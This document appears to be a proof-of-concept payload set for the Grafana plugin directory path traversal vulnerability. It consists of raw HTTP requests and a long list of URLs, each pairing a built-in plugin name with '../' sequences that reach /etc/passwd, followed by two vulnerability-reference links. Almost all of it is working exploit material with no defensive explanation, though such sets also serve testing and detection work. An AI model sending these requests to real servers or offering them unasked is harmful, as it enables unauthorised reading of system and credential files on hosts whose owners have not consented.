GET /public/plugins/a/a  HTTP/1.1Host: Your Ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: zh-CN,en;q=0.5Accept-Encoding: gzip, deflateConnection: closePragma: no-cacheCache-Control: no-cache

GET /public/plugins/grafana-clock-panel/../../../../../../etc/passwd HTTP/1.1Host: Your Ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

/public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugins/alertlist/../../../../../../../../etc/passwd/public/plugins/alertmanager/../../../../../../../../etc/passwd/public/plugins/annolist/../../../../../../../../etc/passwd/public/plugins/barchart/../../../../../../../../etc/passwd/public/plugins/bargauge/../../../../../../../../etc/passwd/public/plugins/canvas/../../../../../../../../etc/passwd/public/plugins/cloudwatch/../../../../../../../../etc/passwd/public/plugins/dashboard/../../../../../../../../etc/passwd/public/plugins/dashlist/../../../../../../../../etc/passwd/public/plugins/debug/../../../../../../../../etc/passwd/public/plugins/elasticsearch/../../../../../../../../etc/passwd/public/plugins/gauge/../../../../../../../../etc/passwd/public/plugins/geomap/../../../../../../../../etc/passwd/public/plugins/gettingstarted/../../../../../../../../etc/passwd/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd/public/plugins/grafana/../../../../../../../../etc/passwd/public/plugins/graph/../../../../../../../../etc/passwd/public/plugins/graphite/../../../../../../../../etc/passwd/public/plugins/heatmap/../../../../../../../../etc/passwd/public/plugins/histogram/../../../../../../../../etc/passwd/public/plugins/influxdb/../../../../../../../../etc/passwd/public/plugins/jaeger/../../../../../../../../etc/passwd/public/plugins/live/../../../../../../../../etc/passwd/public/plugins/logs/../../../../../../../../etc/passwd/public/plugins/loki/../../../../../../../../etc/passwd/public/plugins/mixed/../../../../../../../../etc/passwd/public/plugins/mssql/../../../../../../../../etc/passwd/public/plugins/mysql/../../../../../../../../etc/passwd/public/plugins/news/../../../../../../../../etc/passwd/public/plugins/nodeGraph/../../../../../../../../etc/passwd/public/plugins/opentsdb/../../../../../../../../etc/passwd/public/plugins/piechart/../../../../../../../../etc/passwd/public/plugins/pluginlist/../../../../../../../../etc/passwd/public/plugins/postgres/../../../../../../../../etc/passwd/public/plugins/prometheus/../../../../../../../../etc/passwd/public/plugins/stat/../../../../../../../../etc/passwd/public/plugins/state-timeline/../../../../../../../../etc/passwd/public/plugins/status-history/../../../../../../../../etc/passwd/public/plugins/table-old/../../../../../../../../etc/passwd/public/plugins/table/../../../../../../../../etc/passwd/public/plugins/tempo/../../../../../../../../etc/passwd/public/plugins/testdata/../../../../../../../../etc/passwd/public/plugins/text/../../../../../../../../etc/passwd/public/plugins/timeseries/../../../../../../../../etc/passwd/public/plugins/welcome/../../../../../../../../etc/passwd/public/plugins/xychart/../../../../../../../../etc/passwd/public/plugins/zipkin/../../../../../../../../etc/passwd

https://vas.riskivy.com/vuln-detail?id=104https://nosec.org/home/detail/4914.html